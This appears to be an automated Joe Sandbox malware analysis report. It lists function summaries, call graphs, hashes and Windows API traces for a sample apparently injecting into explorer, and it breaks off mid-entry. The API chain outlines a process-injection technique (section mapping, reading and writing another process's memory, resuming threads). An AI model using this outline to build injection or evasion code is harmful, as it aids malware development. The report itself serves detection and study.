                                                      Function 004018C5 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 49sleepCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 212 4018c5-40190b call 401164 Sleep call 4013cc 222 40191a-401920 212->222 223 40190d-401915 call 4014bf 212->223 226 401931 222->226 227 401928-40192d 222->227 223->222 226->227 228 401934-40194f 226->228 227->228 233 401952-40195b call 401164 228->233 234 401948-40194b 228->234 234->233
                                                      APIs
                                                      • Sleep.KERNELBASE(00001388), ref: 004018F6
                                                        • Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                        • Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.376253469.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_400000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID: CreateDuplicateObjectSectionSleep
                                                      • String ID: zOji
                                                      • API String ID: 4152845823-4118548424
                                                      • Opcode ID: 40e582844cb886fdd248ac7c5f774f7486ed80249be4d22e0ce5f88863c1373c
                                                      • Instruction ID: 5008de21d6646d6a4101a84352d49cb2eeb815b2728bacd1896cd8e4e39b07a0
                                                      • Opcode Fuzzy Hash: 40e582844cb886fdd248ac7c5f774f7486ed80249be4d22e0ce5f88863c1373c
                                                      • Instruction Fuzzy Hash: 46018BB2308205EBDB006E949C61EAE3658AB40724F308033F607780F1C67D8A13F31B
                                                      Function 004018A6 Relevance: 1.3, APIs: 1, Instructions: 61sleepCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 237 4018a6-4018c3 241 4018d4 237->241 242 4018c8-40190b call 401164 Sleep call 4013cc 237->242 241->242 252 40191a-401920 242->252 253 40190d-401915 call 4014bf 242->253 256 401931 252->256 257 401928-40192d 252->257 253->252 256->257 258 401934-40194f 256->258 257->258 263 401952-40195b call 401164 258->263 264 401948-40194b 258->264 264->263
                                                      APIs
                                                      • Sleep.KERNELBASE(00001388), ref: 004018F6
                                                        • Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                        • Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.376253469.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_400000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID: CreateDuplicateObjectSectionSleep
                                                      • String ID:
                                                      • API String ID: 4152845823-0
                                                      • Opcode ID: 2e3e027024aa3d6704b47e5880310210fdf2d46df9c3430db9cfbdec36fb4464
                                                      • Instruction ID: ec7c9f9116aa5c3d7af92c99ccf4db412f3ff1557a2b92ce3f8b18b7d449fb36
                                                      • Opcode Fuzzy Hash: 2e3e027024aa3d6704b47e5880310210fdf2d46df9c3430db9cfbdec36fb4464
                                                      • Instruction Fuzzy Hash: 97016DB2308305EBE7006A959C51EBA3758AB41764F308133B607780F1957D9A17B36F
                                                      Function 004018BE Relevance: 1.3, APIs: 1, Instructions: 56sleepCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 267 4018be-4018c3 271 4018d4 267->271 272 4018c8-40190b call 401164 Sleep call 4013cc 267->272 271->272 282 40191a-401920 272->282 283 40190d-401915 call 4014bf 272->283 286 401931 282->286 287 401928-40192d 282->287 283->282 286->287 288 401934-40194f 286->288 287->288 293 401952-40195b call 401164 288->293 294 401948-40194b 288->294 294->293
                                                      APIs
                                                      • Sleep.KERNELBASE(00001388), ref: 004018F6
                                                        • Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                        • Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.376253469.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_400000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID: CreateDuplicateObjectSectionSleep
                                                      • String ID:
                                                      • API String ID: 4152845823-0
                                                      • Opcode ID: 63246ced83773f111c728f1a43d3fcfa9d239b90abfb008a8a8fe5df5a230609
                                                      • Instruction ID: cc5cf84a4ac16d3ff6e0150408ab5a4d949569ac012fe2ee23f61dbe8ee8ec54
                                                      • Opcode Fuzzy Hash: 63246ced83773f111c728f1a43d3fcfa9d239b90abfb008a8a8fe5df5a230609
                                                      • Instruction Fuzzy Hash: 70014CB2308205EBDB106A959C51EBE3659AB55714F308133B607784F1967D9B13F32B
                                                      Function 004018B1 Relevance: 1.3, APIs: 1, Instructions: 55sleepCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 297 4018b1-4018b3 298 401903-40190b call 4013cc 297->298 299 4018b5-4018c3 297->299 305 40191a-401920 298->305 306 40190d-401915 call 4014bf 298->306 303 4018d4 299->303 304 4018c8-401900 call 401164 Sleep 299->304 303->304 304->298 312 401931 305->312 313 401928-40192d 305->313 306->305 312->313 316 401934-40194f 312->316 313->316 322 401952-40195b call 401164 316->322 323 401948-40194b 316->323 323->322
                                                      APIs
                                                      • Sleep.KERNELBASE(00001388), ref: 004018F6
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.376253469.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_400000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID: Sleep
                                                      • String ID:
                                                      • API String ID: 3472027048-0
                                                      • Opcode ID: 551bf9fc6a161abfac80695604f19aa1aef5469406db7a931b83d04652b6e09e
                                                      • Instruction ID: ef1b3772686a797e33556ea01ceab6b668eb93d7b49977ee198856b5a882b22d
                                                      • Opcode Fuzzy Hash: 551bf9fc6a161abfac80695604f19aa1aef5469406db7a931b83d04652b6e09e
                                                      • Instruction Fuzzy Hash: 210125B2208245EADB006A959C61EBA3799AB41724F308137F607790F1967E8A13F31B
                                                      Function 004018C2 Relevance: 1.3, APIs: 1, Instructions: 51sleepCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 326 4018c2-40190b call 401164 Sleep call 4013cc 338 40191a-401920 326->338 339 40190d-401915 call 4014bf 326->339 342 401931 338->342 343 401928-40192d 338->343 339->338 342->343 344 401934-40194f 342->344 343->344 349 401952-40195b call 401164 344->349 350 401948-40194b 344->350 350->349
                                                      APIs
                                                      • Sleep.KERNELBASE(00001388), ref: 004018F6
                                                        • Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                        • Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.376253469.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_400000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID: CreateDuplicateObjectSectionSleep
                                                      • String ID:
                                                      • API String ID: 4152845823-0
                                                      • Opcode ID: bb19dfe290bac6874ef398e2d88654dc8a7b23ebc8c26647aeabf95c1afcae67
                                                      • Instruction ID: d3c1b2561fc0583f1f6bbc3edf5ccb050f557452f45edf8007d0f6b78c0567ac
                                                      • Opcode Fuzzy Hash: bb19dfe290bac6874ef398e2d88654dc8a7b23ebc8c26647aeabf95c1afcae67
                                                      • Instruction Fuzzy Hash: 14017CB2308205EBDB006A919C51EBE3759AB41724F308133F607780F1967D8A13F31B
                                                      Function 004018DA Relevance: 1.3, APIs: 1, Instructions: 43sleepCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 353 4018da-40190b call 401164 Sleep call 4013cc 360 40191a-401920 353->360 361 40190d-401915 call 4014bf 353->361 364 401931 360->364 365 401928-40192d 360->365 361->360 364->365 366 401934-40194f 364->366 365->366 371 401952-40195b call 401164 366->371 372 401948-40194b 366->372 372->371
                                                      APIs
                                                      • Sleep.KERNELBASE(00001388), ref: 004018F6
                                                        • Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                        • Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.376253469.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_400000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID: CreateDuplicateObjectSectionSleep
                                                      • String ID:
                                                      • API String ID: 4152845823-0
                                                      • Opcode ID: fbcf8db84f0bcb0a2d0b0e49b2c778a116fa09cd0714ede85e20fc239748f007
                                                      • Instruction ID: 8f9a98739febab8b32419077b991bda00f1387bd451c7178a571841fb0c6b49c
                                                      • Opcode Fuzzy Hash: fbcf8db84f0bcb0a2d0b0e49b2c778a116fa09cd0714ede85e20fc239748f007
                                                      • Instruction Fuzzy Hash: A8F044B6204205EBDB006E959C51FAE3768AB44725F344133F612790F1C67D8A52F71B

                                                      Non-executed Functions

                                                      Function 0040328D Relevance: 1.4, APIs: 1, Instructions: 144COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.376253469.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_400000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 40be4076c5679bef0f98681f4824eda593f4152bfce54b2e91414b645047e91a
                                                      • Instruction ID: e65dddffedb48bda66d8c9a675407c692fe6ac043651d9c697b88b541883c6e0
                                                      • Opcode Fuzzy Hash: 40be4076c5679bef0f98681f4824eda593f4152bfce54b2e91414b645047e91a
                                                      • Instruction Fuzzy Hash: E8413631409BD58FC7138F704A661AA7F64FD1332171801EFD881AB2A3C7399B16D79A
                                                      Function 004022D9 Relevance: .1, Instructions: 73COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.376253469.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_400000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c7860815ad4231e939db7468cf30c1f9d63862ef5de29645b67a78e94f400ad0
                                                      • Instruction ID: 407047d8813846ed623c6620c5c661c30d6a874651c06bbb2e7ade0d14a7dce7
                                                      • Opcode Fuzzy Hash: c7860815ad4231e939db7468cf30c1f9d63862ef5de29645b67a78e94f400ad0
                                                      • Instruction Fuzzy Hash: 92117D2020C541FCD321D27CCA0C911BFA99B4F72075401FBD691250C3DAB9094AEBAB
                                                      Function 004022D8 Relevance: .1, Instructions: 72COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.376253469.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_400000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 62f82913357ed83049cd1887261115a72de1e32be9748c9b7b11558f6f6d0137
                                                      • Instruction ID: 5db6927ec116302fd1a3f9be718c7712ee400501de5b38768fcc91fc62191cbb
                                                      • Opcode Fuzzy Hash: 62f82913357ed83049cd1887261115a72de1e32be9748c9b7b11558f6f6d0137
                                                      • Instruction Fuzzy Hash: 56117D2024C581ECD321D37CCA48914BFA69B4F72076801FBD691694C3CAB9454AEBAB
                                                      Function 004022E5 Relevance: .1, Instructions: 68COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.376253469.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_400000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 039acd9b67e764601ba82469f9de9df4a99d24579219de54cf11ac1d4119bc91
                                                      • Instruction ID: 863a443b315763638c31dffea77139fa9fc7248c2f9879795720f54bbf800da4
                                                      • Opcode Fuzzy Hash: 039acd9b67e764601ba82469f9de9df4a99d24579219de54cf11ac1d4119bc91
                                                      • Instruction Fuzzy Hash: 4F115C2020C941ADD321D37CCA08914BFA59B4F72075802FBD6915A0C6CA79454AEF97
                                                      Function 004022F7 Relevance: .1, Instructions: 67COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.376253469.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_400000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3e540363add078f276303d02989b505c159875bf8d0edc9c9c36215123116058
                                                      • Instruction ID: 0c8bb5551e2abd97a64ae9c19d193427848800bdc9eaee9e975189e24a5225cd
                                                      • Opcode Fuzzy Hash: 3e540363add078f276303d02989b505c159875bf8d0edc9c9c36215123116058
                                                      • Instruction Fuzzy Hash: 56112C2020C581EDD321D27CCA09514BF959B4F72475801FBD691690C6DA79454AEB9B
                                                      Function 00402321 Relevance: .1, Instructions: 57COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.376253469.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_400000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 25919fc75364af992eb4b4042875d07686e0c12065a18c89e44093fc2b7c95b2
                                                      • Instruction ID: f976abf0b506ce6ff8f37bbd7c8af7624669eab2ab4b5b0fb9c0d747e7254d45
                                                      • Opcode Fuzzy Hash: 25919fc75364af992eb4b4042875d07686e0c12065a18c89e44093fc2b7c95b2
                                                      • Instruction Fuzzy Hash: 1601472124C991BCE331E33CC908904BFE69B4FB6475802FAD2A15A0C7DA214589DFE7
                                                      Function 004025D3 Relevance: .1, Instructions: 52COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.376253469.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_400000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f4027c6423f46035466e643bdd863a4de9ba613b5b2dc0b913ca9580a9ba2c0d
                                                      • Instruction ID: c5c43ab6752ee8d18fcb74b59ff98ad39f6596117cd62c5b2c77ced72334e6aa
                                                      • Opcode Fuzzy Hash: f4027c6423f46035466e643bdd863a4de9ba613b5b2dc0b913ca9580a9ba2c0d
                                                      • Instruction Fuzzy Hash: B111E2321002609FDF21AF24C49569AFBB2FF4530C375A188C9969B111E722AD8FCB91
                                                      Function 00402686 Relevance: .0, Instructions: 37COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.376253469.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_400000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1e7a0acffb87ace860446896612c735c16b272113d31e621940bc7827f3f290d
                                                      • Instruction ID: c48700b05c06e988df87cd580ca5e4308363d13747befdac9a33251d9afddee9
                                                      • Opcode Fuzzy Hash: 1e7a0acffb87ace860446896612c735c16b272113d31e621940bc7827f3f290d
                                                      • Instruction Fuzzy Hash: 8EF0227101036187CF18AB389498198BBA1EE46668798079EDDA2770D2E327A4A9CB90

                                                      Execution Graph

                                                      Execution Coverage:57.7%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:11%
                                                      Total number of Nodes:155
                                                      Total number of Limit Nodes:9
                                                      execution_graph 1128 2801953 1131 2801980 1128->1131 1141 28019d0 1131->1141 1134 2801973 1135 280199b SleepEx 1135->1135 1136 28019ab 1135->1136 1149 28021c4 1136->1149 1143 2801a07 1141->1143 1142 2801992 1142->1134 1142->1135 1143->1142 1144 2801ad0 RtlCreateHeap 1143->1144 1146 2801b01 1144->1146 1145 2801b0c LoadLibraryA 1145->1142 1145->1146 1146->1145 1147 2801b3b 1146->1147 1147->1142 1148 2801c80 CreateThread CloseHandle CreateThread CloseHandle 1147->1148 1148->1142 1167 2803cd0 1148->1167 1170 2803bf4 1148->1170 1150 28021e2 1149->1150 1178 2804a40 1150->1178 1152 28019c0 1153 2801d8c 1152->1153 1186 2804c90 1153->1186 1155 2801dc7 1156 2801df8 CreateMutexExA 1155->1156 1157 2801e12 1156->1157 1192 2804e00 1157->1192 1159 2801e51 1201 2801f04 1159->1201 1164 2801ebe 1165 2801ee9 SleepEx 1164->1165 1213 280226c 1164->1213 1219 2802cd0 1164->1219 1165->1164 1165->1165 1168 2803ce2 EnumWindows SleepEx 1167->1168 1169 2803d06 1167->1169 1168->1168 1168->1169 1171 2803c11 CreateToolhelp32Snapshot 1170->1171 1172 2803cab 1170->1172 1173 2803c93 SleepEx 1171->1173 1174 2803c25 Process32First 1171->1174 1173->1171 1173->1172 1176 2803c3d 1174->1176 1175 2803c8a CloseHandle 1175->1173 1176->1175 1177 2803c78 Process32Next 1176->1177 1177->1176 1179 2804a69 1178->1179 1180 2804a7d GetTokenInformation 1179->1180 1185 2804b02 1179->1185 1181 2804aa8 1180->1181 1182 2804ab2 GetTokenInformation 1181->1182 1183 2804ada CloseHandle 1182->1183 1183->1185 1185->1152 1187 2804cbd GetVolumeInformationA 1186->1187 1189 2804d10 1187->1189 1227 2805174 CryptAcquireContextA 1189->1227 1191 2804d50 1191->1155 1229 2804f1c 1192->1229 1194 2804e22 RegOpenKeyExA 1195 2804ed3 1194->1195 1198 2804e4f 1194->1198 1196 2804ede ObtainUserAgentString 1195->1196 1196->1159 1197 2804e63 RegQueryValueExA 1197->1198 1198->1197 1199 2804ec9 RegCloseKey 1198->1199 1200 2804eb6 1198->1200 1199->1195 1200->1199 1203 2801f27 1201->1203 1202 2801e7d CreateFileMappingA 1202->1164 1203->1202 1204 280203e 1203->1204 1205 2801f8b DeleteFileW CopyFileW 1203->1205 1231 2803490 1204->1231 1205->1202 1206 2801fab DeleteFileW 1205->1206 1209 2801fc1 1206->1209 1208 280205b CreateFileW 1208->1202 1210 2801ff6 DeleteFileW 1209->1210 1211 280200a 1210->1211 1237 2804920 1211->1237 1214 280229d 1213->1214 1244 28032ec CreateFileW 1214->1244 1216 28022b2 1248 280230c 1216->1248 1218 28022c3 1218->1164 1220 28032ec 2 API calls 1219->1220 1226 2802cf3 1220->1226 1221 2802f55 1221->1164 1223 2802f34 SleepEx 1223->1221 1223->1226 1225 2802efa ResumeThread 1225->1226 1226->1221 1226->1223 1226->1225 1288 2804578 1226->1288 1292 2802fac 1226->1292 1228 28051b9 1227->1228 1228->1191 1230 2804f4c 1229->1230 1230->1194 1232 28034b1 1231->1232 1233 28034d1 GetUserNameW 1232->1233 1234 28034f2 1233->1234 1242 28035e8 CoCreateInstance 1234->1242 1236 280350d 1236->1208 1238 2804947 1237->1238 1239 2804967 SetFileAttributesW CreateFileW 1238->1239 1240 28049b2 SetFileTime 1239->1240 1241 28049d3 1240->1241 1241->1204 1243 2803646 1242->1243 1245 2803341 1244->1245 1247 280338f 1244->1247 1246 2803360 ReadFile 1245->1246 1245->1247 1246->1247 1247->1216 1272 2803de0 1248->1272 1250 28026b8 1250->1218 1251 28025b8 1255 28026f9 1251->1255 1264 2802657 1251->1264 1267 28025d0 1251->1267 1252 280279d 1253 2803de0 2 API calls 1252->1253 1257 28027c4 1253->1257 1254 280235f 1254->1250 1258 28024df DeleteFileW CreateFileW 1254->1258 1260 2802594 1254->1260 1256 2803de0 2 API calls 1255->1256 1261 2802720 1256->1261 1257->1250 1259 2802840 2 API calls 1257->1259 1258->1260 1266 2802522 1258->1266 1259->1250 1260->1251 1260->1252 1261->1250 1263 2802840 2 API calls 1261->1263 1262 2803de0 2 API calls 1262->1267 1263->1250 1264->1250 1265 2803de0 2 API calls 1264->1265 1265->1250 1268 280255b WriteFile 1266->1268 1267->1250 1267->1262 1267->1264 1276 2802840 1267->1276 1270 2802582 1268->1270 1271 2804920 3 API calls 1270->1271 1271->1260 1273 2803e0f 1272->1273 1282 2803f7c 1273->1282 1275 2803f2f 1275->1254 1277 2802c63 1276->1277 1278 2802849 1276->1278 1277->1267 1279 2803f7c 2 API calls 1278->1279 1281 2802948 1278->1281 1279->1281 1280 2803de0 2 API calls 1280->1277 1281->1277 1281->1280 1286 2803fc6 1282->1286 1287 2803fbf 1282->1287 1283 2804276 RtlAllocateHeap 1284 28042a3 1283->1284 1285 28042af RtlReAllocateHeap 1284->1285 1284->1287 1285->1284 1286->1283 1286->1287 1289 28045a8 1288->1289 1290 280461c CreateProcessInternalW 1289->1290 1291 280466f 1290->1291 1291->1226 1293 2802fe3 1292->1293 1306 28032ae 1293->1306 1311 2804760 1293->1311 1296 2804760 NtCreateSection 1297 280305b 1296->1297 1298 2804760 NtCreateSection 1297->1298 1297->1306 1299 280308a 1298->1299 1300 2804760 NtCreateSection 1299->1300 1301 28030da 1300->1301 1302 28031b8 NtQueryInformationProcess 1301->1302 1303 2803198 NtQueryInformationProcess 1301->1303 1304 28031df 1302->1304 1303->1304 1305 28031e7 ReadProcessMemory 1304->1305 1304->1306 1315 2805328 1305->1315 1308 2803212 ReadProcessMemory 1309 2803236 1308->1309 1310 280329f WriteProcessMemory 1309->1310 1310->1306 1312 2804793 1311->1312 1314 280302b 1311->1314 1313 28047b1 NtCreateSection 1312->1313 1312->1314 1313->1314 1314->1296

                                                      Callgraph

                                                      • Executed
                                                      • Not Executed
                                                      • Opacity -> Relevance
                                                      • Disassembly available
                                                      callgraph 0 Function_02801980 9 Function_02801D8C 0->9 30 Function_028021C4 0->30 36 Function_028019D0 0->36 1 Function_02804E00 14 Function_02804F1C 1->14 34 Function_028052CC 1->34 43 Function_028050DC 1->43 2 Function_02801501 3 Function_02801803 4 Function_02805384 5 Function_02801F04 7 Function_02804D8C 5->7 11 Function_02803490 5->11 5->14 16 Function_02804920 5->16 19 Function_02805328 5->19 5->34 6 Function_02801D08 15 Function_02804B1C 6->15 7->19 32 Function_02804FC8 7->32 8 Function_0280230C 8->14 8->16 17 Function_028046A0 8->17 29 Function_02802840 8->29 8->32 33 Function_02805348 8->33 8->34 8->43 46 Function_02803DE0 8->46 51 Function_02805368 8->51 9->1 9->5 10 Function_02804C90 9->10 9->14 9->19 23 Function_028053B0 9->23 9->34 38 Function_02802CD0 9->38 54 Function_0280226C 9->54 57 Function_02805274 9->57 10->14 10->19 10->34 55 Function_02805174 10->55 11->19 11->34 35 Function_0280354C 11->35 50 Function_028035E8 11->50 12 Function_02803A94 13 Function_02804714 14->19 14->32 22 Function_028050B0 15->22 49 Function_02804BE4 15->49 16->19 16->34 17->13 18 Function_02803D20 18->13 18->22 42 Function_028053D8 18->42 20 Function_02806229 21 Function_02802FAC 21->12 21->19 21->32 21->34 45 Function_02804760 21->45 47 Function_02804860 21->47 24 Function_028048B0 24->4 25 Function_02804434 26 Function_02801938 27 Function_02804A40 27->19 27->34 27->42 28 Function_028043C0 28->4 28->19 29->14 29->19 29->32 29->33 29->34 29->43 44 Function_028039DC 29->44 29->46 61 Function_02803F7C 29->61 30->27 31 Function_02801045 35->14 35->19 35->34 36->6 36->14 36->15 36->34 37 Function_02803CD0 36->37 56 Function_02803BF4 36->56 38->7 38->19 38->21 38->32 38->34 52 Function_028032EC 38->52 60 Function_02804578 38->60 39 Function_02801953 39->0 40 Function_028011D4 58 Function_028013F4 40->58 41 Function_02801456 44->12 44->33 45->42 46->4 46->19 46->24 46->34 46->61 48 Function_02801062 50->14 50->34 52->14 52->19 52->32 52->34 53 Function_028017EC 54->8 54->34 54->52 56->13 56->22 59 Function_02801175 60->14 60->19 60->34 61->4 61->14 61->19 61->25 61->28 61->32 61->34 61->51 61->57 62 Function_0280177C 63 Function_028049FC

                                                      Executed Functions

                                                      Function 02802FAC Relevance: 7.9, APIs: 5, Instructions: 360nativeinjectionCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 02804760: NtCreateSection.NTDLL ref: 028047D2
                                                      • NtQueryInformationProcess.NTDLL ref: 028031A2
                                                      • NtQueryInformationProcess.NTDLL ref: 028031CA
                                                      • ReadProcessMemory.KERNEL32 ref: 028031FD
                                                      • ReadProcessMemory.KERNEL32 ref: 0280322B
                                                      • WriteProcessMemory.KERNEL32 ref: 028032A8
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.629839810.0000000002801000.00000020.80000000.00040000.00000000.sdmp, Offset: 02801000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_2801000_explorer.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Process$Memory$InformationQueryRead$CreateSectionWrite
                                                      • String ID:
                                                      • API String ID: 1349948393-0
                                                      • Opcode ID: 927ceaa4fd3a0ab182866fb649d96750ab32dbc44d27f5517bfe2da6e0edd3e9
                                                      • Instruction ID: 1b74813d2321c49d356361a9da28da29c2672dbd8d53aa73bdf02186d94cc7a5
                                                      • Opcode Fuzzy Hash: 927ceaa4fd3a0ab182866fb649d96750ab32dbc44d27f5517bfe2da6e0edd3e9
                                                      • Instruction Fuzzy Hash: 7FB18435A18A4C8FDB58EF58D8856A9B3F1FB5C311F00427ED84AE3285DB30E9068BC5
                                                      Function 02803BF4 Relevance: 7.6, APIs: 5, Instructions: 72processCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 140 2803bf4-2803c0b 141 2803c11-2803c23 CreateToolhelp32Snapshot 140->141 142 2803cab-2803cc4 140->142 143 2803c93-2803ca5 SleepEx 141->143 144 2803c25-2803c3b Process32First 141->144 143->141 143->142 145 2803c86-2803c88 144->145 146 2803c8a-2803c8d CloseHandle 145->146 147 2803c3d-2803c54 call 28050b0 145->147 146->143 150 2803c56-2803c58 147->150 151 2803c5a-2803c68 150->151 152 2803c6c-2803c73 call 2804714 150->152 151->150 153 2803c6a 151->153 155 2803c78-2803c80 Process32Next 152->155 153->155 155->145
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.629839810.0000000002801000.00000020.80000000.00040000.00000000.sdmp, Offset: 02801000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_2801000_explorer.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Process32$CloseCreateFirstHandleNextSleepSnapshotToolhelp32
                                                      • String ID:
                                                      • API String ID: 2482764027-0
                                                      • Opcode ID: fa5a43c44172bddb499ae6b439e922885960bdcd79c62b2d5fce3e2e85a2ac8a
                                                      • Instruction ID: 3ac37a8e4f3295d916b5ff73ecb06bde55b79edf6a411e4085ea241ddd77114d
                                                      • Opcode Fuzzy Hash: fa5a43c44172bddb499ae6b439e922885960bdcd79c62b2d5fce3e2e85a2ac8a
                                                      • Instruction Fuzzy Hash: 6821B738114A088FEB94EF64C8C87AA73E2FB88319F1406BED44FDA1D5DB3495858B51
                                                      Function 02804760 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 105nativeCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 284 2804760-280478d 285 2804793-28047ab call 28053d8 284->285 286 280483b-280483c 284->286 290 28047b1-28047db NtCreateSection 285->290 291 2804832-2804835 285->291 287 280483e-2804857 286->287 292 2804825-2804827 290->292 293 28047dd-28047df 290->293 294 2804837-2804838 291->294 295 2804829-2804830 291->295 292->294 292->295 293->294 296 28047e1-28047e5 293->296 294->286 297 28047e7-280481d 295->297 296->297 297->294 299 280481f-2804823 297->299 299->287
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
